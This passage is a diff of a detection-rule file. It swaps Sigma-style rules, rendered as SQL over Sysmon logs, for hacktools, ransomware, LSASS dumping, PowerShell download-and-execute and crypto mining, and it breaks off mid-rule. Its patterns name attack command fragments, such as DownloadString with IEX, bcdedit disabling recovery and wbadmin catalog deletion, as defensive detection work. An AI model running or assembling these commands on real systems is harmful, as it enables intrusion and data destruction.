+ "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Other legitimate network providers used and not filtred in this rule" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\NetworkProvider%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-NoExit -Command [Console]::OutputEncoding=[Text.UTF8Encoding]::UTF8%' ESCAPE '\\')" ], - "filename": "proc_creation_win_registry_new_network_provider.yml" + "filename": "proc_creation_win_hktl_sliver_c2_execution_pattern.yml" }, { - "title": "Suspicious File Download Using Office Application", - "id": "0c79148b-118e-472b-bdb7-9b57b444cc19", + "title": "HackTool - ADCSPwn Execution", + "id": "cd8c163e-a19b-402e-bdd5-419ff5859f12", "status": "test", - "description": "Detects the usage of one of three Microsoft office applications (Word, Excel, PowerPoint) to download arbitrary files", - "author": "Beyu Denis, oscd.community", + "description": "Detects command line parameters used by ADCSPwn, a tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.credential_access", + "attack.t1557.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 
'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% --adcs %' ESCAPE '\\' AND CommandLine LIKE '% --port %' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_office.yml" + "filename": "proc_creation_win_hktl_adcspwn.yml" }, { - "title": "HackTool - UACMe Akagi Execution", - "id": "d38d2fa4-98e6-4a24-aff1-410b0c9ad177", + "title": "PowerShell Web Download and Execution", + "id": "85b0b087-eddf-4a2b-b033-d771fa2b9775", "status": "experimental", - "description": "Detects the execution of UACMe, a tool used for UAC bypasses, via default PE metadata", - "author": "Christian Burkard (Nextron Systems), Florian Roth (Nextron Systems)", + "description": "Detects suspicious ways to download files or content and execute them using PowerShell Invoke-Expression", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Unknown" + "Scripts or tools that download files and execute them" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Product = 'UACMe' OR Company IN ('REvol Corp', 'APT 92', 'UG North', 'Hazardous Environments', 'CD Project Rekt') OR Description IN ('UACMe main module', 'Pentesting utility') OR OriginalFileName IN ('Akagi.exe', 'Akagi64.exe') OR (Image LIKE '%\\\\Akagi64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Akagi.exe' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=767637C23BB42CD5D7397CF58B0BE688%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=14C4E4C72BA075E9069EE67F39188AD8%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=7D010C6BB6A3726F327F7E239166D127%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=89159BA4DD04E4CE5559F132A9964EB3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5834ED4291BDEB928270428EBBAF7604%' ESCAPE 
'\\' OR Hashes LIKE '%IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3DE09703C8E79ED2CA3F01074719906B%' ESCAPE '\\') OR Imphash IN ('767637c23bb42cd5d7397cf58b0be688', '14c4e4c72ba075e9069ee67f39188ad8', '3c782813d4afce07bbfc5a9772acdbdc', '7d010c6bb6a3726f327f7e239166d127', '89159ba4dd04e4ce5559f132a9964eb3', '6f33f4a5fc42b8cec7314947bd13f30f', '5834ed4291bdeb928270428ebbaf7604', '5a8a8a43f25485e7ee1b201edcbc7a38', 'dc7d30b90b2d8abf664fbed2b1b59894', '41923ea1f824fe63ea5beb84db7a3e74', '3de09703c8e79ed2ca3f01074719906b')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%.DownloadString(%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WebRequest %' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\') AND (CommandLine LIKE '%IEX(%' ESCAPE '\\' OR CommandLine LIKE '%IEX (%' ESCAPE '\\' OR CommandLine LIKE '%I`EX%' ESCAPE '\\' OR CommandLine LIKE '%IE`X%' ESCAPE '\\' OR CommandLine LIKE '%I`E`X%' ESCAPE '\\' OR CommandLine LIKE '%| IEX%' ESCAPE '\\' OR CommandLine LIKE '%|IEX %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Expression%' ESCAPE '\\' OR CommandLine LIKE '%;iex $%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_uacme.yml" + "filename": "proc_creation_win_powershell_download_iex.yml" }, { - "title": "WannaCry Ransomware Activity", - "id": "41d40bff-377a-43e2-8e1b-2e543069e079", - "status": "test", - "description": "Detects WannaCry ransomware activity", - "author": "Florian Roth (Nextron Systems), Tom U. 
@c_APT_ure (collection), oscd.community, Jonhnathan Ribeiro", + "title": "ImagingDevices Unusual Parent/Child Processes", + "id": "f11f2808-adb4-46c0-802a-8660db50fa99", + "status": "experimental", + "description": "Detects unusual parent or children of the ImagingDevices.exe (Windows Contacts) process as seen being used with Bumblebee activity", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1210", - "attack.discovery", - "attack.t1083", "attack.defense_evasion", - "attack.t1222.001", - "attack.impact", - "attack.t1486", - "attack.t1490" + "attack.execution" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\tasksche.exe' ESCAPE '\\' OR Image LIKE '%\\\\mssecsvc.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskdl.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskhsvc.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskse.exe' ESCAPE '\\' OR Image LIKE '%\\\\111.exe' ESCAPE '\\' OR Image LIKE '%\\\\lhdfrgui.exe' ESCAPE '\\' OR Image LIKE '%\\\\linuxnew.exe' ESCAPE '\\' OR Image LIKE '%\\\\wannacry.exe' ESCAPE '\\') OR Image LIKE '%WanaDecryptor%' ESCAPE '\\' OR (CommandLine LIKE '%icacls%' ESCAPE '\\' AND CommandLine LIKE '%/grant%' ESCAPE '\\' AND CommandLine LIKE '%Everyone:F%' ESCAPE '\\' AND CommandLine LIKE '%/T%' ESCAPE '\\' AND CommandLine LIKE '%/C%' ESCAPE '\\' AND CommandLine LIKE '%/Q%' ESCAPE '\\') OR (CommandLine LIKE '%bcdedit%' ESCAPE '\\' AND CommandLine LIKE '%/set%' ESCAPE '\\' AND CommandLine LIKE '%{default}%' ESCAPE '\\' AND CommandLine LIKE '%recoveryenabled%' ESCAPE '\\' AND CommandLine LIKE '%no%' ESCAPE '\\') OR (CommandLine LIKE '%wbadmin%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%catalog%' ESCAPE '\\' AND CommandLine LIKE '%-quiet%' ESCAPE '\\') OR CommandLine LIKE '%@Please\\_Read\\_Me@.txt%' ESCAPE '\\'))" + 
"SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND Image LIKE '%\\\\ImagingDevices.exe' ESCAPE '\\') OR ParentImage LIKE '%\\\\ImagingDevices.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_wannacry.yml" + "filename": "proc_creation_win_imagingdevices_unusual_parents.yml" }, { - "title": "Potential Manage-bde.wsf Abuse To Proxy Execution", - "id": "c363385c-f75d-4753-a108-c1a8e28bdbda", - "status": "test", - "description": "Detects potential abuse of the \"manage-bde.wsf\" script as a LOLBIN to proxy execution", - "author": "oscd.community, Natalia Shornikova, Nasreddine Bencherchali (Nextron Systems)", + "title": "HackTool - SecurityXploded Execution", + "id": "7679d464-4f74-45e2-9e01-ac66c5eb041a", + "status": "stable", + "description": "Detects the execution of SecurityXploded Tools", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1216" + "attack.credential_access", + "attack.t1555" ], "falsepositives": [ "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR OriginalFileName = 'wscript.exe') AND CommandLine LIKE '%manage-bde.wsf%' ESCAPE '\\') OR (((ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\') AND ParentCommandLine LIKE '%manage-bde.wsf%' ESCAPE '\\') AND NOT (Image LIKE '%\\\\cmd.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Company = 'SecurityXploded' OR Image LIKE '%PasswordDump.exe' ESCAPE '\\' OR OriginalFileName LIKE '%PasswordDump.exe' ESCAPE '\\'))" ], - "filename": 
"proc_creation_win_lolbin_manage_bde.yml" + "filename": "proc_creation_win_hktl_secutyxploded.yml" }, { - "title": "Potential MSTSC Shadowing Activity", - "id": "6ba5a05f-b095-4f0a-8654-b825f4f16334", - "status": "test", - "description": "Detects RDP session hijacking by using MSTSC shadowing", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Modification Of Scheduled Tasks", + "id": "1c0e41cd-21bb-4433-9acc-4a2cd6367b9b", + "status": "experimental", + "description": "Detects when an attacker tries to modify an already existing scheduled tasks to run from a suspicious location\nAttackers can create a simple looking task in order to avoid detection on creation as it's often the most focused on\nInstead they modify the task after creation to include their malicious payload\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1563.002" + "attack.execution", + "attack.t1053.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%noconsentprompt%' ESCAPE '\\' AND CommandLine LIKE '%shadow:%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /Change %' ESCAPE '\\' AND CommandLine LIKE '% /TN %' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\' OR 
CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%comspec\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%localappdata\\%%' ESCAPE '\\') AND (CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%bitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%bash.exe%' ESCAPE '\\' OR CommandLine LIKE '%bash %' ESCAPE '\\' OR CommandLine LIKE '%scrcons%' ESCAPE '\\' OR CommandLine LIKE '%wmic %' ESCAPE '\\' OR CommandLine LIKE '%wmic.exe%' ESCAPE '\\' OR CommandLine LIKE '%forfiles%' ESCAPE '\\' OR CommandLine LIKE '%scriptrunner%' ESCAPE '\\' OR CommandLine LIKE '%hh.exe%' ESCAPE '\\' OR CommandLine LIKE '%hh %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_mstsc_rdp_hijack_shadowing.yml" + "filename": "proc_creation_win_schtasks_change.yml" }, { - "title": "HackTool - SharpUp PrivEsc Tool Execution", - "id": "c484e533-ee16-4a93-b6ac-f0ea4868b2f1", - "status": "experimental", - "description": "Detects the use of SharpUp, a tool for local privilege escalation", - "author": "Florian Roth (Nextron Systems)", + "title": "Non-privileged Usage of Reg or Powershell", + "id": "8f02c935-effe-45b3-8fc9-ef8696a9e41d", + "status": "test", + "description": "Search for usage of reg or Powershell by non-privileged users to modify service configuration in registry", + "author": "Teymur Kheirkhabarov (idea), Ryan Plas (rule), oscd.community", "tags": [ - 
"attack.privilege_escalation", - "attack.t1615", - "attack.t1569.002", - "attack.t1574.005" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SharpUp.exe' ESCAPE '\\' OR Description = 'SharpUp' OR (CommandLine LIKE '%HijackablePaths%' ESCAPE '\\' OR CommandLine LIKE '%UnquotedServicePath%' ESCAPE '\\' OR CommandLine LIKE '%ProcessDLLHijack%' ESCAPE '\\' OR CommandLine LIKE '%ModifiableServiceBinaries%' ESCAPE '\\' OR CommandLine LIKE '%ModifiableScheduledTask%' ESCAPE '\\' OR CommandLine LIKE '%DomainGPPPassword%' ESCAPE '\\' OR CommandLine LIKE '%CachedGPPPassword%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%reg %' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\') OR (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%set-itemproperty%' ESCAPE '\\' OR CommandLine LIKE '% sp %' ESCAPE '\\' OR CommandLine LIKE '%new-itemproperty%' ESCAPE '\\')) AND (IntegrityLevel = 'Medium' AND CommandLine LIKE '%ControlSet%' ESCAPE '\\' AND CommandLine LIKE '%Services%' ESCAPE '\\' AND (CommandLine LIKE '%ImagePath%' ESCAPE '\\' OR CommandLine LIKE '%FailureCommand%' ESCAPE '\\' OR CommandLine LIKE '%ServiceDLL%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_sharpup.yml" + "filename": "proc_creation_win_susp_non_priv_reg_or_ps.yml" }, { - "title": "DarkSide Ransomware Pattern", - "id": "965fff6c-1d7e-4e25-91fd-cdccd75f7d2c", + "title": "Suspicious Outlook Child Process", + "id": "208748f7-881d-47ac-a29c-07ea84bf691d", "status": "test", - "description": "Detects DarkSide Ransomware and helpers", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a suspicious process spawning from an Outlook process.", + "author": "Michael Haag, Florian 
Roth (Nextron Systems), Markus Neis, Elastic, FPT.EagleEye Team", "tags": [ "attack.execution", - "attack.t1204" + "attack.t1204.002" ], "falsepositives": [ - "Unknown", - "UAC bypass method used by other malware" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%=[char][byte](''0x''+%' ESCAPE '\\' OR CommandLine LIKE '% -work worker0 -path %' ESCAPE '\\') OR (ParentCommandLine LIKE '%DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}%' ESCAPE '\\' AND Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\OUTLOOK.EXE' ESCAPE '\\' AND (Image LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR Image LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR Image LIKE '%\\\\msdt.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_darkside_ransomware.yml" + "filename": "proc_creation_win_office_outlook_susp_child_processes.yml" }, { - "title": "Time Travel Debugging Utility Usage", - "id": "0b4ae027-2a2d-4b93-8c7e-962caaba5b2a", + 
"title": "Winnti Malware HK University Campaign", + "id": "3121461b-5aa0-4a41-b910-66d25524edbb", "status": "test", - "description": "Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.", - "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", + "description": "Detects specific process characteristics of Winnti malware noticed in Dec/Jan 2020 in a campaign against Honk Kong universities", + "author": "Florian Roth (Nextron Systems), Markus Neis", "tags": [ "attack.defense_evasion", - "attack.credential_access", - "attack.t1218", - "attack.t1003.001" + "attack.t1574.002", + "attack.g0044" ], "falsepositives": [ - "Legitimate usage by software developers/testers" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\tttracer.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR ParentImage LIKE '%\\\\hpqhvind.exe%' ESCAPE '\\') AND Image LIKE 'C:\\\\ProgramData\\\\DRM%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\ProgramData\\\\DRM%' ESCAPE '\\' AND Image LIKE '%\\\\wmplayer.exe' ESCAPE '\\') OR (ParentImage LIKE '%\\\\Test.exe' ESCAPE '\\' AND Image LIKE '%\\\\wmplayer.exe' ESCAPE '\\') OR Image LIKE 'C:\\\\ProgramData\\\\DRM\\\\CLR\\\\CLR.exe' ESCAPE '\\' OR (ParentImage LIKE 'C:\\\\ProgramData\\\\DRM\\\\Windows%' ESCAPE '\\' AND Image LIKE '%\\\\SearchFilterHost.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_tttracer_mod_load.yml" + "filename": "proc_creation_win_apt_winnti_mal_hk_jan20.yml" }, { - "title": "LSASS Memory Dumping", - "id": "ffa6861c-4461-4f59-8a41-578c39f3f23e", - "status": "test", - "description": "Detect creation of dump files containing the memory space of lsass.exe, which 
contains sensitive credentials.\nIdentifies usage of Sysinternals procdump.exe to export the memory space of lsass.exe which contains sensitive credentials.\n", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", + "title": "PUA - CsExec Execution", + "id": "d08a2711-ee8b-4323-bdec-b7d85e892b31", + "status": "experimental", + "description": "Detects the use of the lesser known remote execution tool named CsExec a PsExec alternative", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.resource_development", + "attack.t1587.001", + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%lsass%' ESCAPE '\\' AND CommandLine LIKE '%.dmp%' ESCAPE '\\') AND NOT (Image LIKE '%\\\\werfault.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\csexec.exe' ESCAPE '\\' OR Description = 'csexec'))" ], - "filename": "proc_creation_win_susp_lsass_dump.yml" + "filename": "proc_creation_win_pua_csexec.yml" }, { - "title": "Exploit for CVE-2015-1641", - "id": "7993792c-5ce2-4475-a3db-a3a5539827ef", + "title": "Potential Crypto Mining Activity", + "id": "66c3b204-9f88-4d0a-a7f7-8a57d521ca55", "status": "stable", - "description": "Detects Winword starting uncommon sub process MicroScMgmt.exe as used in exploits for CVE-2015-1641", + "description": "Detects command line parameters or strings often used by crypto miners", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036.005" + "attack.impact", + "attack.t1496" ], "falsepositives": [ - "Unknown" + "Legitimate use of crypto miners", + "Some build frameworks" ], - "level": "critical", + "level": "high", "rule": [ - 
"SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' AND Image LIKE '%\\\\MicroScMgmt.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '% --cpu-priority=%' ESCAPE '\\' OR CommandLine LIKE '%--donate-level=0%' ESCAPE '\\' OR CommandLine LIKE '% -o pool.%' ESCAPE '\\' OR CommandLine LIKE '% --nicehash%' ESCAPE '\\' OR CommandLine LIKE '% --algo=rx/0 %' ESCAPE '\\' OR CommandLine LIKE '%stratum+tcp://%' ESCAPE '\\' OR CommandLine LIKE '%stratum+udp://%' ESCAPE '\\' OR CommandLine LIKE '%LS1kb25hdGUtbGV2ZWw9%' ESCAPE '\\' OR CommandLine LIKE '%0tZG9uYXRlLWxldmVsP%' ESCAPE '\\' OR CommandLine LIKE '%tLWRvbmF0ZS1sZXZlbD%' ESCAPE '\\' OR CommandLine LIKE '%c3RyYXR1bSt0Y3A6Ly%' ESCAPE '\\' OR CommandLine LIKE '%N0cmF0dW0rdGNwOi8v%' ESCAPE '\\' OR CommandLine LIKE '%zdHJhdHVtK3RjcDovL%' ESCAPE '\\' OR CommandLine LIKE '%c3RyYXR1bSt1ZHA6Ly%' ESCAPE '\\' OR CommandLine LIKE '%N0cmF0dW0rdWRwOi8v%' ESCAPE '\\' OR CommandLine LIKE '%zdHJhdHVtK3VkcDovL%' ESCAPE '\\') AND NOT ((CommandLine LIKE '% pool.c %' ESCAPE '\\' OR CommandLine LIKE '% pool.o %' ESCAPE '\\' OR CommandLine LIKE '%gcc -%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_cve_2015_1641.yml" + "filename": "proc_creation_win_susp_crypto_mining_monero.yml" }, { - "title": "Renamed BrowserCore.EXE Execution", - "id": "8a4519e8-e64a-40b6-ae85-ba8ad2177559", - "status": "experimental", - "description": "Detects process creation with a renamed BrowserCore.exe (used to extract Azure tokens)", - "author": "Max Altgelt (Nextron Systems)", + "title": "Exploit for CVE-2017-8759", + "id": "fdd84c68-a1f6-47c9-9477-920584f94905", + "status": "test", + "description": "Detects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.t1528", - 
"attack.t1036.003" + "attack.execution", + "attack.t1203", + "attack.t1204.002", + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'BrowserCore.exe' AND NOT ((Image LIKE '%\\\\BrowserCore.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' AND Image LIKE '%\\\\csc.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_renamed_browsercore.yml" + "filename": "proc_creation_win_exploit_cve_2017_8759.yml" }, { - "title": "Manage Engine Java Suspicious Sub Process", - "id": "cea2b7ea-792b-405f-95a1-b903ea06458f", - "status": "experimental", - "description": "Detects suspicious sub processes started by the Manage Engine ServiceDesk Plus Java web service process", - "author": "Florian Roth (Nextron Systems)", + "title": "Interactive AT Job", + "id": "60fc936d-2eb0-4543-8a13-911c750a1dfc", + "status": "test", + "description": "Detects an interactive AT job, which may be used as a form of privilege escalation.", + "author": "E.M. 
Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "tags": [ + "attack.privilege_escalation", + "attack.t1053.002" + ], "falsepositives": [ - "Legitimate sub processes started by Manage Engine ServiceDesk Pro" + "Unlikely (at.exe deprecated as of Windows 8)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\ManageEngine\\\\ServiceDesk\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\java.exe%' ESCAPE '\\' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE '%\\\\notepad.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\query.exe' ESCAPE '\\')) AND NOT (((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '% stop%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\at.exe' ESCAPE 